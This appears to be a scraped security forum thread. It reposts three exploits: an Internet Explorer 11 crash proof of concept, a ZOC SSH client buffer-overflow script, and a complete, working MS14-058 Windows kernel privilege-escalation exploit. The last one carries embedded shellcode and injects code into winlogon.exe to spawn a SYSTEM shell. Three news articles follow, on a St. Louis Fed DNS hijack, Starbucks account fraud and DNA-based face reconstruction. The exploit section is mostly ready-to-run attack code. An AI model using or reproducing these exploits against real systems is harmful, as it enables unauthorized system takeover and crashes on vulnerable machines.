  17. # Exploit Title: Internet Explorer 11 - Crash PoC # Google Dork: N/A # Date: 19th May, 2015 # Exploit Author: garage4hackers # Vendor Homepage: http://garage4hackers.com/showthread.php?t=6246 # Software Link: N/A # Version: Tested on IE 11 # Tested on: Windows 7 # CVE : N/A <!doctype html> <html> <HEAD><title>case522207.html</title> <meta http-equiv="Content-type" content="text/html;charset=UTF-8"> <style> *:nth-child(5)::before { content: 'moof'; } *:nth-child(5)::after { content:'>>'; } </style> </HEAD><body> <script> elem0 = document.createElementNS('http://www.w3.org/2000/svg', 'svg') elem1 = document.createElementNS('http://www.w3.org/2000/svg', 'feGaussianBlur') elem2 = document.createElementNS('http://www.w3.org/2000/svg', 'svg') elem3 = document.createElement('dd') elem4 = document.createElement('map') elem5 = document.createElement('i') elem6 = document.createElementNS('http://www.w3.org/2000/svg', 'svg') document.body.appendChild(elem0) elem0.appendChild(elem1) elem1.appendChild(elem2) elem1.appendChild(elem3) elem1.appendChild(elem4) elem1.appendChild(elem5) elem1.appendChild(elem6) rangeTxt = document.body.createTextRange() randOldNode = document.documentElement.firstChild randOldNode.parentNode.replaceChild(elem2, randOldNode) rangeTxt.moveEnd('sentence', '-20') </script> </body></html> How do I reproduce it? - It has been discovered, tested & reduced on Win7 32-bit Ultimate and runs successfully anytime. a) Enable Page Heap # gflags.exe /p /enable iexplore.exe /full Execute runMe.html in WinDbg c) Tested on Win7 32-bit, Win8.1 32-bit, Win8.1 64-bit (not working on Win8, IE 10) Source
  18. """ # Exploit title: ZOC SSH Client v.7.03.0 Buffer overflow vulnerability (SEH) # Date: 20-5-2015 # Vendor homepage: www.emtec.com # Software Link: http://www.emtec.com/cgi-local/download.cgi?what=ZOC7%20(Windows)&link=zoc/zoc7030.exe&ext=html # Author: Dolev Farhi # Details: # -------- # Create a new connection, run the py script and copy the AAAA...string from zoc.txt to clipboard. paste it in the # server address and attempt to connect. """ #!/usr/bin/python filename="zoc.txt" buffer = "\x41" * 97 textfile = open(filename , 'w') textfile.write(buffer) textfile.close() Source
  19. # Windows 8.0 - 8.1 x64 TrackPopupMenu Privilege Escalation (MS14-058) # CVE-2014-4113 Privilege Escalation # http://www.offensive-security.com # Thx to Moritz Jodeit for the beautiful writeup # http://www.exploit-db.com/docs/35152.pdf # Target OS Windows 8.0 - 8.1 x64 # Author: Matteo Memelli ryujin <at> offensive-security.com from ctypes import * from ctypes.wintypes import * import struct, sys, os, time, threading, signal ULONG_PTR = PVOID = LPVOID HCURSOR = HICON PDWORD = POINTER(DWORD) PQWORD = POINTER(LPVOID) LRESULT = LPVOID UCHAR = c_ubyte QWORD = c_ulonglong CHAR = c_char NTSTATUS = DWORD MIIM_STRING = 0x00000040 MIIM_SUBMENU = 0x00000004 WH_CALLWNDPROC = 0x4 GWLP_WNDPROC = -0x4 NULL = 0x0 SystemExtendedHandleInformation = 64 ObjectDataInformation = 2 STATUS_INFO_LENGTH_MISMATCH = 0xC0000004 STATUS_BUFFER_OVERFLOW = 0x80000005L STATUS_INVALID_HANDLE = 0xC0000008L STATUS_BUFFER_TOO_SMALL = 0xC0000023L STATUS_SUCCESS = 0 TOKEN_ALL_ACCESS = 0xf00ff DISABLE_MAX_PRIVILEGE = 0x1 FORMAT_MESSAGE_FROM_SYSTEM = 0x00001000 PAGE_EXECUTE_READWRITE = 0x00000040 PROCESS_ALL_ACCESS = ( 0x000F0000 | 0x00100000 | 0xFFF ) VIRTUAL_MEM = ( 0x1000 | 0x2000 ) TH32CS_SNAPPROCESS = 0x02 WinFunc1 = WINFUNCTYPE(LPVOID, INT, WPARAM, LPARAM) WinFunc2 = WINFUNCTYPE(HWND, LPVOID, INT, WPARAM, LPARAM) WNDPROC = WINFUNCTYPE(LPVOID, HWND, UINT, WPARAM, LPARAM) bWndProcFlag = False bHookCallbackFlag = False EXPLOITED = False Hmenu01 = Hmenu02 = None # /* # * windows/x64/exec - 275 bytes # * http://www.metasploit.com # * VERBOSE=false, PrependMigrate=false, EXITFUNC=thread, # * CMD=cmd.exe # */ SHELLCODE = ( "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" "\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd\x9d\xff" "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x6d\x64" "\x2e\x65\x78\x65\x00") class LSA_UNICODE_STRING(Structure): """Represent the LSA_UNICODE_STRING on ntdll.""" _fields_ = [ ("Length", USHORT), ("MaximumLength", USHORT), ("Buffer", LPWSTR), ] class SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX(Structure): """Represent the SYSTEM_HANDLE_TABLE_ENTRY_INFO on ntdll.""" _fields_ = [ ("Object", PVOID), ("UniqueProcessId", PVOID), ("HandleValue", PVOID), ("GrantedAccess", ULONG), ("CreatorBackTraceIndex", USHORT), ("ObjectTypeIndex", USHORT), ("HandleAttributes", ULONG), ("Reserved", ULONG), ] class SYSTEM_HANDLE_INFORMATION_EX(Structure): """Represent the SYSTEM_HANDLE_INFORMATION on ntdll.""" _fields_ = [ ("NumberOfHandles", PVOID), ("Reserved", PVOID), ("Handles", SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX * 1), ] class PUBLIC_OBJECT_TYPE_INFORMATION(Structure): """Represent the PUBLIC_OBJECT_TYPE_INFORMATION on ntdll.""" _fields_ = [ ("Name", LSA_UNICODE_STRING), ("Reserved", ULONG * 22), ] class MENUITEMINFO(Structure): """Contains information about a menu item.""" _fields_ = [ ("cbSize" , UINT), ("fMask" , UINT), ("fType" , UINT), ("fState" , UINT), ("wID" , UINT), ("hSubMenu" , HMENU), ("hbmpChecked" , HBITMAP), ("hbmpUnchecked", HBITMAP), ("dwItemData" , ULONG_PTR), ("dwTypeData" , LPWSTR), ("cch" , UINT), ("hbmpItem" , HBITMAP), ] class WNDCLASS(Structure): """Contains the window class attributes that are registered by the RegisterClass function.""" _fields_ = [ ("style" , UINT), ("lpfnWndProc" , WNDPROC), ("cbClsExtra" , INT), ("cbWndExtra" , INT), ("hInstance" , HINSTANCE), ("hIcon" , HCURSOR), ("hCursor" , HBITMAP), ("hbrBackground", HBRUSH), ("lpszMenuName" , LPWSTR), ("lpszClassName", LPWSTR), ] class PROCESSENTRY32(Structure): """Describes an entry from a list of the processes residing in the system address space when a snapshot was taken.""" _fields_ = [ ( 'dwSize' , DWORD ) , ( 'cntUsage' , DWORD) , ( 'th32ProcessID' , DWORD) , ( 'th32DefaultHeapID' , POINTER(ULONG)) , ( 'th32ModuleID' , DWORD) , ( 'cntThreads' , DWORD) , ( 'th32ParentProcessID' , DWORD) , ( 'pcPriClassBase' , LONG) , ( 'dwFlags' , DWORD) , ( 'szExeFile' , CHAR * MAX_PATH ) ] user32 = windll.user32 kernel32 = windll.kernel32 ntdll = windll.ntdll advapi32 = windll.advapi32 user32.PostMessageW.argtypes = [HWND, UINT, WPARAM, LPARAM] user32.PostMessageW.restype = BOOL user32.DefWindowProcW.argtypes = [HWND, UINT, WPARAM, LPARAM] user32.DefWindowProcW.restype = LRESULT user32.UnhookWindowsHook.argtypes = [DWORD, WinFunc1] user32.UnhookWindowsHook.restype = BOOL user32.SetWindowLongPtrW.argtypes = [HWND, DWORD, WinFunc2] user32.SetWindowLongPtrW.restype = LPVOID user32.CallNextHookEx.argtypes = [DWORD, DWORD, WPARAM, LPARAM] user32.CallNextHookEx.restype = LRESULT user32.RegisterClassW.argtypes = [LPVOID] user32.RegisterClassW.restype = BOOL user32.CreateWindowExW.argtypes = [DWORD, LPWSTR, LPWSTR, DWORD, INT, INT, INT, INT, HWND, HMENU, HINSTANCE, LPVOID] user32.CreateWindowExW.restype = HWND user32.InsertMenuItemW.argtypes = [HMENU, UINT, BOOL, LPVOID] user32.InsertMenuItemW.restype = BOOL user32.DestroyMenu.argtypes = [HMENU] user32.DestroyMenu.restype = BOOL user32.SetWindowsHookExW.argtypes = [DWORD, WinFunc1, DWORD, DWORD] user32.SetWindowsHookExW.restype = BOOL user32.TrackPopupMenu.argtypes = [HMENU, UINT, INT, INT, INT, HWND, DWORD] user32.TrackPopupMenu.restype = BOOL advapi32.OpenProcessToken.argtypes = [HANDLE, DWORD , POINTER(HANDLE)] advapi32.OpenProcessToken.restype = BOOL advapi32.CreateRestrictedToken.argtypes = [HANDLE, DWORD, DWORD, DWORD, DWORD, DWORD, DWORD, DWORD, POINTER(HANDLE)] advapi32.CreateRestrictedToken.restype = BOOL advapi32.AdjustTokenPrivileges.argtypes = [HANDLE, BOOL, DWORD, DWORD, DWORD, DWORD] advapi32.AdjustTokenPrivileges.restype = BOOL advapi32.ImpersonateLoggedOnUser.argtypes = [HANDLE] advapi32.ImpersonateLoggedOnUser.restype = BOOL kernel32.GetCurrentProcess.restype = HANDLE kernel32.WriteProcessMemory.argtypes = [HANDLE, QWORD, LPCSTR, DWORD, POINTER(LPVOID)] kernel32.WriteProcessMemory.restype = BOOL kernel32.OpenProcess.argtypes = [DWORD, BOOL, DWORD] kernel32.OpenProcess.restype = HANDLE kernel32.VirtualAllocEx.argtypes = [HANDLE, LPVOID, DWORD, DWORD, DWORD] kernel32.VirtualAllocEx.restype = LPVOID kernel32.CreateRemoteThread.argtypes = [HANDLE, QWORD, UINT, QWORD, LPVOID, DWORD, POINTER(HANDLE)] kernel32.CreateRemoteThread.restype = BOOL kernel32.CreateToolhelp32Snapshot.argtypes = [DWORD, DWORD] kernel32.CreateToolhelp32Snapshot.restype = HANDLE kernel32.CloseHandle.argtypes = [HANDLE] kernel32.CloseHandle.restype = BOOL kernel32.Process32First.argtypes = [HANDLE, POINTER(PROCESSENTRY32)] kernel32.Process32First.restype = BOOL kernel32.Process32Next.argtypes = [HANDLE, POINTER(PROCESSENTRY32)] kernel32.Process32Next.restype = BOOL kernel32.GetCurrentThreadId.restype = DWORD ntdll.NtAllocateVirtualMemory.argtypes = [HANDLE, LPVOID, ULONG, LPVOID, ULONG, DWORD] ntdll.NtAllocateVirtualMemory.restype = NTSTATUS ntdll.NtQueryObject.argtypes = [HANDLE, DWORD, POINTER(PUBLIC_OBJECT_TYPE_INFORMATION), DWORD, DWORD] ntdll.NtQueryObject.restype = NTSTATUS ntdll.NtQuerySystemInformation.argtypes = [DWORD, POINTER(SYSTEM_HANDLE_INFORMATION_EX), DWORD, POINTER(DWORD)] ntdll.NtQuerySystemInformation.restype = NTSTATUS def log(msg, e=None): if e == "e": msg = "[!] " + msg if e == "d": msg = "[*] " + msg else: msg = "[+] " + msg print msg def getLastError(): """Format GetLastError""" buf = create_string_buffer(2048) if kernel32.FormatMessageA(FORMAT_MESSAGE_FROM_SYSTEM, NULL, kernel32.GetLastError(), 0, buf, sizeof(buf), NULL): log(buf.value, "e") else: log("Unknown Error", "e") class x_file_handles (Exception): pass def get_type_info(handle): """Get the handle type information.""" public_object_type_information = PUBLIC_OBJECT_TYPE_INFORMATION() size = DWORD(sizeof(public_object_type_information)) while True: result = ntdll.NtQueryObject(handle, ObjectDataInformation, byref(public_object_type_information), size, 0x0) if result == STATUS_SUCCESS: return public_object_type_information.Name.Buffer elif result == STATUS_INFO_LENGTH_MISMATCH: size = DWORD(size.value * 4) resize(public_object_type_information, size.value) elif result == STATUS_INVALID_HANDLE: return "INVALID HANDLE: %s" % hex(handle) else: raise x_file_handles("NtQueryObject", hex(result)) def get_handles(): """Return all the open handles in the system""" system_handle_information = SYSTEM_HANDLE_INFORMATION_EX() size = DWORD (sizeof (system_handle_information)) while True: result = ntdll.NtQuerySystemInformation( SystemExtendedHandleInformation, byref(system_handle_information), size, byref(size) ) if result == STATUS_SUCCESS: break elif result == STATUS_INFO_LENGTH_MISMATCH: size = DWORD(size.value * 4) resize(system_handle_information, size.value) else: raise x_file_handles("NtQuerySystemInformation", hex(result)) pHandles = cast( system_handle_information.Handles, POINTER(SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX * \ system_handle_information.NumberOfHandles) ) for handle in pHandles.contents: yield handle.UniqueProcessId, handle.HandleValue, handle.Object def WndProc(hwnd, message, wParam, lParam): """Window procedure""" global bWndProcFlag if message == 289 and not bWndProcFlag: bWndProcFlag = True user32.PostMessageW(hwnd, 256, 40, 0) user32.PostMessageW(hwnd, 256, 39, 0) user32.PostMessageW(hwnd, 513, 0, 0) return user32.DefWindowProcW(hwnd, message, wParam, lParam) def hook_callback_one(code, wParam, lParam): """Sets a new address for the window procedure""" global bHookCallbackFlag if ((cast((lParam+sizeof(HANDLE)*2),PDWORD)).contents).value == 0x1eb and\ not bHookCallbackFlag: bHookCallbackFlag = True if user32.UnhookWindowsHook(WH_CALLWNDPROC, CALLBACK01): # Sets a new address for the window procedure log("Callback triggered!") log("Setting the new address for the window procedure...") lpPrevWndFunc = user32.SetWindowLongPtrW\ ((cast((lParam+sizeof(HANDLE)*3),PDWORD).contents).value, GWLP_WNDPROC, CALLBACK02) return user32.CallNextHookEx(0, code, wParam, lParam) def hook_callback_two(hWnd, Msg, wParam, lParam): """Once called will return the fake tagWND address""" global EXPLOITED user32.EndMenu() EXPLOITED = True log("Returning the fake tagWND and overwriting token privileges...") return 0x00000000FFFFFFFB def buildMenuAndTrigger(): """Create menus and invoke TrackPopupMenu""" global Hmenu01, Hmenu02 log("Creating windows and menus...") wndClass = WNDCLASS() wndClass.lpfnWndProc = WNDPROC(WndProc) wndClass.lpszClassName = u"pwned" wndClass.cbClsExtra = wndClass.cbWndExtra = 0 # Registering Class if not user32.RegisterClassW(addressof(wndClass)): log("RegisterClassW failed", "e") sys.exit() # Creating the Window hWnd = user32.CreateWindowExW(0, u"pwned", u"pwned", 0, -1, -1, 0, 0, NULL, NULL, NULL, NULL) if not hWnd: log("CreateWindowExW Failed", "e") sys.exit() # Creating popup menu user32.CreatePopupMenu.restype = HMENU Hmenu01 = user32.CreatePopupMenu() if not Hmenu01: log("CreatePopupMenu failed 0x1", "e") sys.exit() Hmenu01Info = MENUITEMINFO() Hmenu01Info.cbSize = sizeof(MENUITEMINFO) Hmenu01Info.fMask = MIIM_STRING # Insert first menu if not user32.InsertMenuItemW(Hmenu01, 0, True, addressof(Hmenu01Info)): log("Error in InsertMenuItema 0x1", "e") user32.DestroyMenu(Hmenu01) sys.exit() # Creating second menu Hmenu02 = user32.CreatePopupMenu() if not Hmenu02: log("CreatePopupMenu failed 0x2", "e") sys.exit() Hmenu02Info = MENUITEMINFO() Hmenu02Info.cbSize = sizeof(MENUITEMINFO) Hmenu02Info.fMask = (MIIM_STRING | MIIM_SUBMENU) Hmenu02Info.dwTypeData = "" Hmenu02Info.cch = 1 Hmenu02Info.hSubMenu = Hmenu01 # Insert second menu if not user32.InsertMenuItemW(Hmenu02, 0, True, addressof(Hmenu02Info)): log("Error in InsertMenuItema 0x2", "e") user32.DestroyMenu(Hmenu01) user32.DestroyMenu(Hmenu01) sys.exit() # Set window callback tid = kernel32.GetCurrentThreadId() if not user32.SetWindowsHookExW(WH_CALLWNDPROC, CALLBACK01, NULL, tid): log("Failed SetWindowsHookExA 0x1", "e") sys.exit() # Crash it! log("Invoking TrackPopupMenu...") user32.TrackPopupMenu(Hmenu02, 0, -10000, -10000, 0, hWnd, NULL) def alloctagWND(): """Allocate a fake tagWND in userspace at address 0x00000000fffffff0""" hProcess = HANDLE(kernel32.GetCurrentProcess()) hToken = HANDLE() hRestrictedToken = HANDLE() if not advapi32.OpenProcessToken(hProcess,TOKEN_ALL_ACCESS, byref(hToken)): log("Could not open current process token", "e") getLastError() sys.exit() if not advapi32.CreateRestrictedToken(hToken, DISABLE_MAX_PRIVILEGE, 0, 0, 0, 0, 0, 0, byref(hRestrictedToken)): log("Could not create the restricted token", "e") getLastError() sys.exit() if not advapi32.AdjustTokenPrivileges(hRestrictedToken, 1, NULL, 0, NULL, NULL): log("Could not adjust privileges to the restricted token", "e") getLastError() sys.exit() # Leak Token addresses in kernel space log("Leaking token addresses from kernel space...") for pid, handle, obj in get_handles(): if pid==os.getpid() and get_type_info(handle) == "Token": if hToken.value == handle: log("Current process token address: %x" % obj) if hRestrictedToken.value == handle: log("Restricted token address: %x" % obj) RestrictedToken = obj CurrentProcessWin32Process = "\x00"*8 # nt!_TOKEN+0x40 Privileges : _SEP_TOKEN_PRIVILEGES # +0x3 overwrite Enabled in _SEP_TOKEN_PRIVILEGES, -0x8 ADD RAX,0x8 TokenAddress = struct.pack("<Q", RestrictedToken+0x40+0x3-0x8) tagWND = "\x41"*11 + "\x00\x00\x00\x00" +\ "\x42"*0xC + "\xf0\xff\xff\xff\x00\x00\x00\x00" +\ "\x00"*8 +\ "\x43"*0x145 + CurrentProcessWin32Process + "\x45"*0x58 +\ TokenAddress + "\x47"*0x28 ## Allocate space for the input buffer lpBaseAddress = LPVOID(0x00000000fffffff0) Zerobits = ULONG(0) RegionSize = LPVOID(0x1000) written = LPVOID(0) dwStatus = ntdll.NtAllocateVirtualMemory(0xffffffffffffffff, byref(lpBaseAddress), 0x0, byref(RegionSize), VIRTUAL_MEM, PAGE_EXECUTE_READWRITE) if dwStatus != STATUS_SUCCESS: log("Failed to allocate tagWND object", "e") getLastError() sys.exit() # Copy input buffer to the fake tagWND nSize = 0x200 written = LPVOID(0) lpBaseAddress = QWORD(0x00000000fffffff0) dwStatus = kernel32.WriteProcessMemory(0xffffffffffffffff, lpBaseAddress, tagWND, nSize, byref(written)) if dwStatus == 0: log("Failed to copy the input buffer to the tagWND object", "e") getLastError() sys.exit() log("Fake win32k!tagWND allocated, written %d bytes to 0x%x" %\ (written.value, lpBaseAddress.value)) return hRestrictedToken def injectShell(hPrivilegedToken): """Impersonate privileged token and inject shellcode into winlogon.exe""" while not EXPLOITED: time.sleep(0.1) log("-"*70) log("Impersonating the privileged token...") if not advapi32.ImpersonateLoggedOnUser(hPrivilegedToken): log("Could not impersonate the privileged token", "e") getLastError() sys.exit() # Get winlogon.exe pid pid = getpid("winlogon.exe") # Get a handle to the winlogon process we are injecting into hProcess = kernel32.OpenProcess(PROCESS_ALL_ACCESS, False, int(pid)) if not hProcess: log("Couldn't acquire a handle to PID: %s" % pid, "e") sys.exit() log("Obtained handle 0x%x for the winlogon.exe process" % hProcess) # Creating shellcode buffer to inject into the host process sh = create_string_buffer(SHELLCODE, len(SHELLCODE)) code_size = len(SHELLCODE) # Allocate some space for the shellcode (in the program memory) sh_address = kernel32.VirtualAllocEx(hProcess, 0, code_size, VIRTUAL_MEM, PAGE_EXECUTE_READWRITE) if not sh_address: log("Could not allocate shellcode in the remote process") getLastError() sys.exit() log("Allocated memory at address 0x%x" % sh_address) # Inject shellcode in to winlogon.exe process space written = LPVOID(0) shellcode = QWORD(sh_address) dwStatus = kernel32.WriteProcessMemory(hProcess, shellcode, sh, code_size, byref(written)) if not dwStatus: log("Could not write shellcode into winlogon.exe", "e") getLastError() sys.exit() log("Injected %d bytes of shellcode to 0x%x" % (written.value, sh_address)) # Now we create the remote thread and point its entry routine to be head of # our shellcode thread_id = HANDLE(0) if not kernel32.CreateRemoteThread(hProcess, 0, 0, sh_address, 0, 0, byref(thread_id)): log("Failed to inject shellcode into winlogon.exe") sys.exit(0) log("Remote thread 0x%08x created" % thread_id.value) log("Spawning SYSTEM shell...") # Kill python process to kill the window and avoid BSODs os.kill(os.getpid(), signal.SIGABRT) def getpid(procname): """ Get Process Pid by procname """ pid = None try: hProcessSnap = kernel32.CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0) pe32 = PROCESSENTRY32() pe32.dwSize = sizeof(PROCESSENTRY32) ret = kernel32.Process32First(hProcessSnap , byref(pe32)) while ret: if pe32.szExeFile == LPSTR(procname).value: pid = pe32.th32ProcessID ret = kernel32.Process32Next(hProcessSnap, byref(pe32)) kernel32.CloseHandle ( hProcessSnap ) except Exception, e: log(str(e), "e") if not pid: log("Could not find %s PID" % procname) sys.exit() return pid CALLBACK01 = WinFunc1(hook_callback_one) CALLBACK02 = WinFunc2(hook_callback_two) if __name__ == '__main__': log("MS14-058 Privilege Escalation - ryujin <at> offensive-security.com", "d") # Prepare the battlefield hPrivilegedToken = alloctagWND() # Start the injection thread t1 = threading.Thread(target=injectShell, args = (hPrivilegedToken,)) t1.daemon = False t1.start() # Trigger the vuln buildMenuAndTrigger() Source
  20. The St. Louis Federal Reserve today sent a message to those it serves alerting them that in late April 2015 attackers succeeded in hijacking the domain name servers for the institution. The attack redirected Web searches and queries for those seeking a variety of domains run by the government entity to a Web page set up by the attackers in an apparent bid by cybercrooks to hijack online communications of banks and other entities dealing with the regional Fed office. The communique, shared by an anonymous source, was verified as legitimate by a source at another regional Federal Reserve location. The notice from the St. Louis Fed stated that the “the Federal Reserve Bank of St. Louis has been made aware that on April 24, 2015, computer hackers manipulated routing settings at a domain name service (DNS) vendor used by the St. Louis Fed so that they could automatically redirect some of the Bank’s web traffic that day to rogue webpages they created to simulate the look of the St. Louis Fed’s research.stlouisfed.org website, including webpages for FRED, FRASER, GeoFRED and ALFRED.” Requests for comment from the St. Louis Fed so far have gone unreturned. It remains unclear what impact, if any, this event has had on the normal day-to-day operations of hundreds of financial institutions that interact with the regional Fed operator. The advisory noted that “as is common with these kinds of DNS attacks, users who were redirected to one of these phony websites may have been unknowingly exposed to vulnerabilities that the hackers may have put there, such as phishing, malware and access to user names and passwords.” The statement continues: “These risks apply to individuals who attempted to access the St. Louis Fed’s research.stlouisfed.org website on April 24, 2015. If you attempted to log into your user account on that date, it is possible that this malicious group may have accessed your user name and password. The St. Louis Fed’s website itself was not compromised. According to Wikipedia, the Federal Reserve Economic Data (FRED) is a database maintained by the Research division of the Federal Reserve Bank of St. Louis that has more than 247,000 economic time series from 79 sources. The data can be viewed in graphical and text form or downloaded for import to a database or spreadsheet, and viewed on mobile devices. They cover banking, business/fiscal, consumer price indexes, employment and population, exchange rates, gross domestic product, interest rates, monetary aggregates, producer price indexes, reserves and monetary base, U.S. trade and international transactions, and U.S. financial data. FRASER stands for the Federal Reserve Archival System for Economic Research, and reportedly contains links to scanned images (PDF format) of historic economic statistical publications, releases, and documents including the annual Economic Report of the President. Coverage starts with the 19th and early 20th century for some economic and banking reports. According to the Federal Reserve, GeoFred allows authorized users to create, customize, and share geographical maps of data found in FRED. ALFRED, short for ArchivaL Federal Reserve Economic Data, allows users to retrieve vintage versions of economic data that were available on specific dates in history. The St. Louis Federal Reserve is one of twelve regional Fed organizations, and serves banks located in the all of Arkansas and portions of six other states: Illinois, Indiana, Kentucky, Mississippi, Missouri and Tennessee. According to the reserve’s Web site, it also serves most of eastern Missouri and southern Illinois. No information is available at this time about the attackers involved in this intrusion, but given the time lag between this event and today’s disclosure it seems likely that it is related to state-sponsored hacking activity from a foreign adversary. If the DNS compromise also waylaid emails to and from the institution, this could be a much bigger deal. This is likely to be a fast-moving story. More updates as they become available. Source
  21. Starbucks has rebuffed claims that its mobile app has been hacked, in the wake of reports that scores of its US customers have suffered from credit card fraud. The coffee chain’s US customers have been reporting the theft of hundreds of dollars from their credit cards, in a series of scams seemingly linked to auto top-ups on the Starbucks mobile app. Victims commonly receive emails saying the passwords and login details for Starbucks’ mobile app had been reset before receiving notice of fraudulent transactions. However, Starbucks denies its app has been hacked. In a statement, the coffee chain suggested the isolated reports of fraudulent activity on customers’ online accounts are down to password re-use or other lax security practices by its clients. Starbucks takes the obligation to protect customers’ information seriously. News reports that the Starbucks mobile app has been hacked are false. Like all major retailers, the company has safeguards in place to constantly monitor for fraudulent activity and works closely with financial institutions. To protect the integrity of these security measures, Starbucks will not disclose specific details but can assure customers their security is incredibly important and all concerns related to customer security are taken seriously. Occasionally, Starbucks receives reports from customers of unauthorized activity on their online account. This is primarily caused when criminals obtain reused names and passwords from other sites and attempt to apply that information to Starbucks. To protect their security, customers are encouraged to use different user names and passwords for different sites, especially those that keep financial information. Reports that hackers were targeting Starbucks mobile users – stealing from linked credit cards without knowing account numbers – first surfaced this week. Bob Sullivan, journalist and consumer advocate, was the the first to report on the scam. Sullivan recommends that all Starbucks consumers immediately disable auto-reload on the Starbucks mobile payments and gift cards. Criminals who obtain username and password credentials for Starbucks.com first drain a consumer’s stored value before siphoning off funds from their linked credit card. Starbucks reportedly allows consumers to move balances from one gift card to another. Hackers can also cash out by using a hijacked account to buy gift cards. These can then be sent to an arbitrary email address which can be trivially registered – without secondary confirmation – from within hijacked Starbucks accounts. In its statement, Starbucks said “customers are not responsible for charges or transfers they did not make. If a customer’s Starbucks Card is registered, their account balance is protected”, so those who have been left out of pocket will hopefully get their money back. The apparent scam appears to be limited to the US. El Reg understands that Starbucks customers in Europe and elsewhere outside North America have not been affected. Roy Tobin, a threat researcher at security software firm Webroot, recommended that consumers and businesses alike should re-examine their security practices. "Credentials leaked in previous cyber-attacks are likely to have been used to allow hackers to siphon off money from Starbucks' customers," Tobin said. "The key security take-away from this incident is the fact that as a company, your customers’ security information often doesn’t exist in a bubble. Passwords are frequently saved to browsers or documents, and are repeatedly re-used by customers across separate online accounts. Consumers should take steps to regularly change their passwords and avoid using the same password across multiple online services," he said. For businesses, the use of two-factor authentication technology can help mitigate against this class of threat, according to Tobin. "Companies must anticipate this vulnerability by implementing more rigorous security processes, making it harder for hackers to access their customers’ accounts," he added. "Best practice for mitigating this is the implementation of a two-factor authentication process that requires the user to verify their identity when logging in from a new device or location whenever financial details are accessed or used," he concluded. Source
  22. NEXT TIME YOU’RE about to toss a cigarette butt on the ground, consider this freaky fact: It takes less than a nanogram (or less than one billionth of the mass of a penny) of your dried saliva for scientists to construct a digital portrait that bears an uncanny resemblance to your very own face. For proof look to Hong Kong, where a recent ad campaign takes advantage of phenotyping, the prediction of physical appearance based on bits of DNA, to publicly shame people who have littered. If you walk around the city, you’ll notice portraits of people who look both scarily realistic and yet totally fake. These techno-futuristic most-wanted signs are the work of ad agency Ogilvy for nonprofit Hong Kong Cleanup, which is attempting to curb Hong Kong’s trash problem with the threat of high-tech scarlet lettering. It’s an awful lot like the Stranger Visions project from artist Heather Dewey-Hagborg, who used a similar technique a couple years back to construct sculptural faces as a way to provoke conversation around what we should be using these biological tools for. In the case of Hong Kong’s Face Of Litter campaign, the creative team teamed up with Parabon Nanolabs, a company out of Virginia that has developed a method to construct digital portraits from small traces of DNA. Parabon began developing this technology more than five years ago in tandem with the Department of Defense, mostly to use as a tool in criminal investigations. Parabon’s technique draws on the growing wealth of information we have about the human genome. By analyzing saliva or blood, the company is able to make an educated prediction of what you might look like. Most forensic work uses DNA to create a fingerprint, or a series of data points that will give a two-dimensional look at an individual that can be matched to pre-existing DNA samples. “We’re interested in using DNA as a blueprint,” explains Steven Armentrout, founder of Parabon. “We read the genetic code.” The DNA found on the Hong Kong trash is taken to a genotyping lab, where a massive data set on the litterbug is produced. This data, when processed with Parabon’s machine-learning algorithms, begins to form a rough snapshot of certain phenotypes, or traits. Parabon focuses on what it describes as highly heritable traits—or traits that have the least amount of environmental variability involved. Things like eye color, hair color, skin color, freckling, and face shape are far easier to determine than height, age, and even hair morphology (straight, wavy, or curly). The Ogilvy team says it accounted for age by studying market research on the types of litter it processed. For example, people ages 18-34 are more likely to chew gum, so any gum samples were automatically given an average age in that range. Whereas the portraits of cigarette litterers, more common among the 45-plus group, were depicted as slightly older. It’s an imperfect science in some regards, and yet, the capabilities are astounding—and more than a little scary. Ogilvy says it received permission from every person whose trash they picked up, so in that way, it’s not a true case of unsolicited public shaming. And Parabon itself says its services are only available for criminal investigations (and, apparently, ad campaigns). But the message is still chilling. A project like The Face of Litter should serve as a provocation to talk critically about privacy, consent, and ethics surrounding the unsanctioned appropriation of someone’s DNA. So for now, the next time you drop that empty bag of Doritos onto the ground, you’re in the clear. But in the future? Just know it’s totally possible that you might be seeing your likeness plastered onto the subway walls. Source
